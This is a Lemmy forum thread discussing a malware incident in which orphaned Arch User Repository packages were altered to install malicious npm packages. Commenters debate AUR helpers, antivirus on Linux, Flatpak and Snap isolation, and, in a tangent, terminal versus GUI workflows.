• placebo@lemmy.zipEnglish
      10·
      4 days ago

      Tbf most major attacks we saw recently are cross-platform thanks to npm. AUR has always been a security risk.

    • Alaknár@sopuli.xyz
      4·
      4 days ago

      Wasn’t that long ago when I was downvoted to oblivion for saying that. Glad to see the community is maturing.

  • macniel@feddit.org
    993·
    5 days ago

    Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
    Linux Users: oh no I got malware by searching the AUR!

    • rtxn@lemmy.worldM
      441·
      5 days ago

      The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).

      But if it starts downloading anything from NPM… ^C and run.

      • Lucy :3@feddit.org
        23·
        5 days ago

        The most unsafe factor of the AUR is aur helpers and their goal to dumb everything down and streamline the process as if the AUR where an official repo

        • CubitOom@infosec.pubEnglish
          81·
          4 days ago

          I’m not entirely sure I agree, I think the issue is with default settings.

          Like you could use both yay and paru to diff the PKGBUILD of the most recent updat and then read it, and then approve each. And I think that’s pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.

          • bitfucker@programming.dev
            3·
            4 days ago

            Yeah, use and promote aurto instead. They require you to trust the maintainer and would remove the package from the local repo if the maintainer is changed

            • CubitOom@infosec.pubEnglish
              2·
              4 days ago

              I’m not sure if loosing the maintainer is to only thing we should be going off of here, but I like the name.

              • bitfucker@programming.dev
                1·
                4 days ago

                Well, it is just like a distro maintainer account anyway. If the maintainer account is compromised then gg for the whole distro. That’s what happens with other supply chain attacks as well and yes, I do think we need a way to fix that without compromising on ease of usability

                • CubitOom@infosec.pubEnglish
                  1·
                  4 days ago

                  We arnt talking about a distro maintainer, but an aur package maintainer, which can be anyone.

    • Lucy :3@feddit.org
      9·
      5 days ago

      By misusing the AUR and ignoring every warning telling you to read and understand the pkgbuild or don’t do it.

      • TerHu@lemmy.dbzer0.com
        16·
        5 days ago

        as much as i love nvim and understand people who love emacs, there are people who want that big gui thing. for those i’d recommend VSCodium if they feel like they really can’t live without VSCode or Gram for those who got to like Zed.

        • Thorry@feddit.org
          4·
          4 days ago

          I was anti GUI for years. Having learnt to program on a tiny green and black 40x24 CRT on my old MSX back in the 80s. I remember being made fun of by fellow students and co workers alike for doing almost everything in the terminal. This included huge projects with complex file trees and lots of files.

          But as time went on, I started to appreciate the GUI more and more. And these days I’m all for using a GUI for a lot of things.

          Especially in IDEs that can do a lot of things with short keyboard shortcuts. I now have multiple monitors, including a large 32" primary. I always have stacks upon stacks of windows open and manage them efficiently. There’s always at least a couple of terminals hanging out and of course most IDEs also have terminal windows baked in. But all of the extra visual tools help me out a lot.

          • voodooattack@lemmy.world
            2·
            4 days ago

            Almost the exact opposite for me. Used to hog GUIs and hated keyboard shortcuts with a passion, but then I came across Niri, fell in love with the idea, and the whole scrolling window manager thing made my productivity explode. I can’t use traditional desktop environments anymore. Tried to go back and literally can’t.

            Tmux wasn’t that far behind.

            • tal@lemmy.todayEnglish
              1·
              3 days ago

              and the whole scrolling window manager thing…tmux wasn’t that far behnd

              I remember one time reflecting on how many layers I have at which one can expand workspace.

              1. Linux virtual terminals. By default, Debian runs 7 login sessions on seven virtual terminals and sticks the GUI (Wayland/Xorg) on the eighth. So Control-Alt-F1 through Control-Alt-F7 will get me a Linux terminal. I can stick more programs on more virtual terminals with openvt. That’s the first layer.

              2. Okay, so on virtual terminal 8, I’ve got Wayland running. On that, I’m running Sway. That has an infinite number of workspaces that can be created. Currently, I only have bindings set up for 10 (and I use nonstandard bindings for them, Super-q N to switch to the Nth workspace) because I didn’t find myself actually using named workspaces. This is the second layer.

              3. Within a workspace, I can have Wayland windows. Say I can have two or three windows reasonably visible. This can be expanded whenever opening a window; for example, Super-t to open a new virtual terminal emulator window. This is the third layer.

              4. One of the most common windows I use is a virtual terminal emulator, foot. That can run a program. I typically have it running tmux, which can have its own list of concurrently-running terminal programs (I use Control-O as the tmux meta key). This is the fourth layer.

              5. I often use emacs. Emacs has multiple “frames”; one can “clone” the current frame with C-x 5 c. When run in a terminal, this basically acts like another tmux-like layer where one shows one frame at a time. This is the fifth layer.

              6. Inside an emacs frame, one can have multiple emacs windows (analogous to what is typically called “panes” in other software) showing various things at the same time. One can open a new window with C-x 2 or C-x 3, cycle with C-x o. This is the sixth layer.

              7. Emacs has a list of buffers, any one of which can be shown in a given emacs window. A “buffer” is vaguely analogous to “an open file” in some other programs, but could also be showing a terminal emulator or similar. One can switch with C-x b. This is the seventh layer.

              8. Say I’m running a terminal emulator in one running bash (M-x term RET RET). bash has its own job control; one can suspend a running program and bring bash to the fore with Control-Z, list running jobs with jobs, then resume a suspended job in the background with $ bg %1 to background the first or bring a job to the foreground with $ fg %1. This isn’t quite the same thing as the other layers, since the screen state isn’t maintained for separate programs and restored, but it can reasonably allow one to run simultaneous things and follow each. This is the eighth layer.

              • voodooattack@lemmy.world
                1·
                3 days ago

                Noping the heck outta that. All I want is better top-level organisation, you just described what I’d call an anti-pattern in my book.

                I wouldn’t nest things that deep through so many different tools/framework/layers that can’t talk to one another. That’s just asking for trouble. You’d waste one of two things: time searching or focus for memorising and recall, you lose something either way. And in the case of the latter you’re bound to forget and start wasting time to search over time anyway.

    • Siegfried@lemmy.world
      4·
      4 days ago

      Did clamav work with AUR affected packages? Sorry if the question is idiotic, cause im ignorant when it comes to security

    • Crozekiel@lemmy.zipEnglish
      2·
      3 days ago

      I am really curious about this. If someone had ClamAV and updated any of these packages from the AUR during the attack, would ClamAV have “solved” that problem? I would love to know the effectiveness of that.

    • helpImTrappedOnline@lemmy.world
      4·
      3 days ago

      Well that’s fun. Odd someone named Campbell asking was for a tomato soup recipe, you’d think that would just be built into their bloodline or something.

      While I’m glad no JS package managers were hurt to make the soup, I do wish the recipe didn’t waste so much water.

    • magnolia_mayhem@lemmy.world
      2·
      3 days ago

      Just keep sending requests and use as many tokens as possible. My wife spent 30 minutes on the phone with a bot the other day, just getting it to dump huge sets of instructions to waste tokens.

      • CubitOom@infosec.pubEnglish
        7·
        5 days ago

        Good question, I guess I might be using the wrong word when i say “orphan” because I see the arch wiki uses that term differently

        Orphans are packages that were installed as a dependency and are no longer required by any package.

        https://wiki.archlinux.org/title/Pacman/Tips_and_tricks

        You can remove these manually or if using an aur helper like yay there are flags/settings you can use to delete them after the desired package was installed.

        However what I was talking about aur packages that are unmaintained or do not have a maintainer anymore.

        I’m researching more at the moment.

        • Eager Eagle@lemmy.worldEnglish
          6·
          5 days ago

          shit, I had 150 orphaned packages

          pacman -Qdtq | pacman -Rns -

          I made an alias for this, but IMO this cleanup should be automatic. The user didn’t install it themselves after all.

    • littleomid@feddit.orgEnglish
      83·
      5 days ago

      Waiting for updating doesn’t make any difference. The packages could be infected at any point.

      • CubitOom@infosec.pubEnglish
        7·
        5 days ago

        The packages could be infected at any point.

        I guess the same could be said for literally any open source or freely distributed project.

        The difference is that this was a supply chain attack and, to my knowledge, required the package to be listed as orphaned unmaintained first so that the PKGBUILD could be modified to install malicious NPM packages.

        The community caught it quickly because it is possible to read both the PKGBUILD and the output of the update and, I think, it is fully resolved as of now.

        Basically, if one were to delete or replace orphaned packages then they wouldn’t have been infected.

        It is also possible to add a CVE scanner for AUR packages if reading the PKGBUILD is too much, I’m looking into how to do that now.

        All this is to say that you should check if you had an infected package but I personally don’t think using the aur is more risky than using a flatpak.

      • 87Six@lemmy.zip
        21·
        5 days ago

        Waiting for updating doesn’t make any difference.

        Are linux users allowed to juat lie like that? I thought if you do that you need to use Windows.

    • Albbi@piefed.caEnglish
      3·
      5 days ago

      They also wait until they get off the rollercoaster and back on solid ground before yelling yay!

      • pressanykeynow@lemmy.world
        22·
        4 days ago

        But your brain should be the best antivirus you have.

        Is there an AUR package for it? seems not in the official repo

      • placebo@lemmy.zipEnglish
        9·
        4 days ago

        But your brain should be the best antivirus you have.

        It’s useful to use brain, but any security layer has holes which is why it’s useful to have several layers. Some attacks might be way beyond user’s understanding or come from trusted sources.

      • UnderpantsWeevil@lemmy.worldEnglish
        5·
        4 days ago

        But your brain should be the best antivirus you have.

        True of virtually every OS.

        But “only stupid people get viruses” is exactly the kind of trap that catches folks.

      • AceSLive@lemmy.world
        2·
        4 days ago

        I have eset home but now I’ve gone completely linux, and they don’t do it for home - only business

        Which sucks, as I have a year left on my subscription I can no longer use :/

    • Ghoelian@piefed.socialEnglish
      101·
      4 days ago

      one thread I found from 2 years ago where someone asked for the same thing, a lot of the replies are just “you don’t need antivirus on Linux” lmao

      • CeeBee_Eh@lemmy.world
        23·
        4 days ago

        a lot of the replies are just “you don’t need antivirus on Linux”

        Which is completely true when using distros like Debian, Fedora, RHEL, OpenSuse, etc.

        Arch (and its derivatives) are designed to be on the bleeding edge with ALL the paper cuts that come with it. It is absolutely not focused on stability or security. If you want those things then stick to Debian or Fedora Silverblue.

        And the second you introduce npm to your system you can throw any semblance of security out the window, regardless of what your operating system is, and no antivirus is going to save you.

        That being said, the fundamental security models between Linux and Windows are very different. And on Linux the overall impact will likely be far less damaging (technologically, not financially) than on Windows. Windows “security” is just a corporate marketing campaign.

          • CeeBee_Eh@lemmy.world
            21·
            3 days ago

            npm, yes. Snap and flatpak? No. I’m not saying it’s impossible to get malware. The difference is that snapd and flatpak have various levels of process isolation that largely mitigates any potential issues.

            The argument isn’t “Linux doesn’t have malware”, the argument is “you don’t need to run antivirus on Linux”. Those are two very different things.

            Not even the best antivirus will protect you completely, at that point you need good computer hygiene.

            • Crozekiel@lemmy.zipEnglish
              1·
              3 days ago

              Eh. Flatpak has the option for process isolation, but it kinda works similarly to how android apps have default permissions set and the packager can just go “nah, this gets FULL permissions” and unless you go look and change it yourself, the program isn’t restricted at all. I don’t use ubuntu/snapd so can’t speak to that.

              There are more protections on flathub than the AUR for sure - the AUR is closer to just downloading random shit off the internet than a true repository. That said, it’s crazy to assign the vulnerabilities of the AUR to Arch as a whole… The Arch repos proper (and even Chaotic AUR) didn’t have problems during any of this.

              • CeeBee_Eh@lemmy.world
                2·
                2 days ago

                Flatpak has the option for process isolation, but it kinda works similarly to how android apps have default permissions set and the packager can just go “nah, this gets FULL permissions” and unless you go look and change it yourself, the program isn’t restricted at all.

                You’re not wrong, but even with the AUR it’s (last I checked/heard) a problem with orphaned packages being picked up by random users, and then a “new” PKGBUILD with the malicious bits getting uploaded.

                The reality is that even if everyone just blindly updated through yay this whole time, very few people would be affected because the number of orphaned packages installed is very low. The package managers tend to bug you about orphaned packages.

                The difference with Flatpaks and the Snap Store is that you can’t just take ownership over an abandoned project. You’d have to create your own. And since Canonical is in charge of the Snap Store, they’re quick to react to any sort of security issue.

                the AUR is closer to just downloading random shit off the internet than a true repository

                Ultimately that is what it is. Because some packages are grabbing files from just about anywhere.

                The Arch repos proper (and even Chaotic AUR) didn’t have problems during any of this.

                And that’s really the key. The AUR is bleeding edge with “here be dragons” philosophy. Like I said in my previous comment, if you can’t accept those dangerous (work computer, sensitive data, etc) then simply don’t use Arch.